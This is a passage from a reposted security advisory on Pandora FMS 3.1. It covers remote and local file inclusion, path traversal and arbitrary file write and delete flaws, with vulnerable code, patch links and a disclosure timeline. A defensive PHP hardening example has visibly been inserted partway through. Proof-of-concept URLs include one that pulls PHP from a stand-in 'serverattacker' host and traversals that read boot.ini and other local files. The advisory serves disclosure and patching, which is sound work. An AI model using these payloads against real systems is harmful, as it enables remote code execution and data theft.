February 1, 2011 at 11:56 pm | Posted in Article, computer and high technology

It can be deployed on almost any operating system. It features remote
monitoring (WMI, SNMP, TCP, UDP, ICMP, HTTP, ...) and it can also use
agents; an agent is available for each platform. It can also monitor
hardware with a TCP/IP stack, such as load balancers, routers,
network switches, printers or firewalls.

This software has several servers that collect and process information from
different sources: WMI for gathering remote Windows information, a
predictive server, a plug-in server which runs complex user-defined
network tests, an advanced export server to replicate data between
different Pandora FMS sites, a network discovery server, and an SNMP
Trap console.

Released under the terms of the GNU General Public License, Pandora FMS
is free software.

5) Path Traversal:

5.1 – PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) –
CVE-2010-4281 – CVE-2010-4282 – CVSS 8.5/10

The 'page' parameter of ajax.php does not properly sanitize user-supplied
input. The function safe_url_extraclean filters the ':' character, so the
string "http://" cannot be used to build URLs, but it allows the '/'
character, and an attacker could reference remote resources through
Windows UNC paths of the form //servername//resource/file.

Note that the first check in safe_url_extraclean filters '://', so the
filter can be bypassed easily with http://http://url, because it only
strips the first protocol://. However, the last preg_replace strips the ':'
character.

Proof of concept (UNC):

http://servername/pandora_console/ajax.php?page=//server/share/test

As well, ajax.php allows any PHP file on the disk filesystem to be included:

http://servername/pandora_console/ajax.php?page=../../../../../directory/file

The NULL character is not allowed because of the safe_url_extraclean filtering, so it is not possible to include files other than PHP files, but the '.' and '/' characters are still allowed.

5.2 – PHP File Inclusion (or RFI: Remote file inclusion) – CVE-2010-4283 – CVSS 7.9/10

An attacker can inject arbitrary PHP code and execute it remotely because the argv[1] parameter is not filtered in the file pandora_diag.php.

PoC:

http://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php

Note: this issue needs register_globals set to On to be exploitable.

5.3 – Path traversal & Local file inclusion vulnerabilities – CVE-2010-4282 – CVSS 6.8/10

An attacker can include arbitrary files from the filesystem via the id parameter in the file pandora_help.php.

Snippet of vulnerable code:

24 $id = get_parameter ('id');
25
26 /* Possible file locations */
27 $files = array ($config["homedir"]."/include/help/".$config["language"]."/help_".$id.".php",
28         $config["homedir"].ENTERPRISE_DIR."/include/help/".$config["language"]."/help_".$id.".php",
29         $config["homedir"].ENTERPRISE_DIR."/include/help/en/help_".$id.".php",
30         $config["homedir"]."/include/help/en/help_".$id.".php");
31 $help_file = '';
32 foreach ($files as $file) {
33         if (file_exists ($file)) {
34                 $help_file = $file;
35                 break;
36         }
37 }
...
62 require_once ($help_file);

Proof of concept:

http://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini

This bug is platform dependent; you can read more at http://seclists.org/fulldisclosure/2010/Jul/137

It only works on Windows systems: an attacker can include a local file using ../ sequences because the id parameter is not filtered. If magic_quotes_gpc is Off, arbitrary files such as boot.ini can be included using the NULL character; if not, only PHP files are allowed.

5.4 – Path traversal & Arbitrary write and delete files – CVE-2010-4282 – CVSS 8.0/10

In the file operation/agentes/networkmap.php the 'layout' parameter is handled in an insecure way and is used to write and delete files on the filesystem. An attacker could use this parameter to write to arbitrary paths and even remove files.

Snippet of vulnerable code:

32 $layout = (string) get_parameter ('layout', 'radial');
...
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;
...
157         $fh = @fopen ($filename_dot, 'w');
158         if ($fh === false) {
159                 $result = false;
160         } else {
161                 fwrite ($fh, $graph);
162                 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng - -o".$filename_img." ".$filename_dot;
163                 $result = system ($cmd);
164                 fclose ($fh);
165                 unlink ($filename_dot);
166         }
...
178         require ($filename_map);

The character sequence '../' could be used to write files (through the -o parameters on lines 162 and 163), as well as potentially to remove files (lines 157, 161 and 165) or include them (line 178). As in 5.3, this issue is only exploitable in Windows environments, for the same reason.
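A hardened counterpart of the two path-building lookups above, serving both 5.3 (the 'id' of pandora_help.php) and 5.4 (the 'layout' of networkmap.php), written here as an added example rather than code from Pandora FMS or its patch: the parameter is restricted to an identifier allowlist before it is ever joined to a path, the resolved help file is proven to sit under the help directory with realpath(), and the layout name is shell-escaped before it reaches system(). The function names, the 64-character bound and the .dot/.map/.png suffixes are assumptions.

```php
<?php
// Added example, not Pandora FMS code: hardened counterparts of the 5.3
// (pandora_help.php 'id') and 5.4 (networkmap.php 'layout') lookups.

// Accept only a plain identifier. This rejects '../', '/', '\' and NUL bytes,
// so neither traversal nor the NUL-truncation trick of 5.3 reaches the
// filesystem calls below. The 64-character bound is an assumption.
function is_safe_name($value)
{
    return is_string($value) && preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $value) === 1;
}

// Resolve help_<id>.php for $lang (falling back to 'en') under $help_dir and
// prove the result stays inside it. Returns the real path, or false.
function resolve_help_file($help_dir, $lang, $id)
{
    if (!is_safe_name($id) || !is_safe_name($lang)) {
        return false;
    }
    $base = realpath($help_dir);
    if ($base === false) {
        return false;
    }
    foreach (array($lang, 'en') as $candidate) {
        $real = realpath($base . DIRECTORY_SEPARATOR . $candidate
                       . DIRECTORY_SEPARATOR . 'help_' . $id . '.php');
        // realpath() has already collapsed '..' and symlinks, so a prefix
        // test on its output is a real containment check, not a string guess.
        if ($real !== false && strpos($real, $base . DIRECTORY_SEPARATOR) === 0) {
            return $real;
        }
    }
    return false;
}

// Build the graphviz command of 5.4 from a validated layout name. The .dot,
// .map and .png suffixes are assumptions; every path is still shell-escaped
// so system() never sees unquoted user input.
function networkmap_command($attachment_store, $layout, $font_size, $filter = 'dot')
{
    if (!is_safe_name($layout) || preg_match('/\A\d{1,3}\z/', (string) $font_size) !== 1) {
        return false;
    }
    $dot = $attachment_store . '/networkmap_' . $layout . '.dot';
    $map = $attachment_store . '/networkmap_' . $layout . '.map';
    $img = $attachment_store . '/networkmap_' . $layout . '_' . $font_size . '.png';
    return escapeshellcmd($filter) . ' -Tcmapx -o' . escapeshellarg($map)
         . ' -Tpng -o' . escapeshellarg($img) . ' ' . escapeshellarg($dot);
}
```

Because realpath() returns false for a file that does not exist, a missing help page is reported as not found instead of falling through to require_once with an attacker-chosen path.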
[+] Impact

An attacker can execute operating system commands, inject remote code in the context of the application, read arbitrary files from the filesystem or extract any data from the database, including passwords and confidential information about the monitored network/systems. It is also possible to bypass authentication or escalate privileges to become admin, gaining full control of the web application and web server. These vulnerabilities have a high impact on the confidentiality, integrity, and availability of the system.

[+] Systems affected

Versions prior to and including 3.1 of Pandora FMS are affected.

[+] Solution

Apply the security fix for version 3.1:

http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download

Or upgrade to version 3.1.1 from

http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/

[+] Timeline

Aug 2010: First contact with vendor
Aug 2010: Confirmation from vendor
Sept 2010: Second contact: SQL Injection vulnerabilities
Sept 2010: Confirmation that the fix will be released on October
Oct 2010: PandoraFMS security patch for 3.1 version released
Oct 2010: Request for CVE numbers
Nov 2010: PandoraFMS version 3.1.1 released
Nov 2010: Disclosure of this advisory

[+] References

Official PandoraFMS site: http://pandorafms.org/
SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
Common Vulnerability Scoring System (CVSS) v2 calculator: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/

[+] Credits

These vulnerabilities have been discovered by Juan Galiana Lara –
@jgaliana – http://juangaliana.blogspot.com/

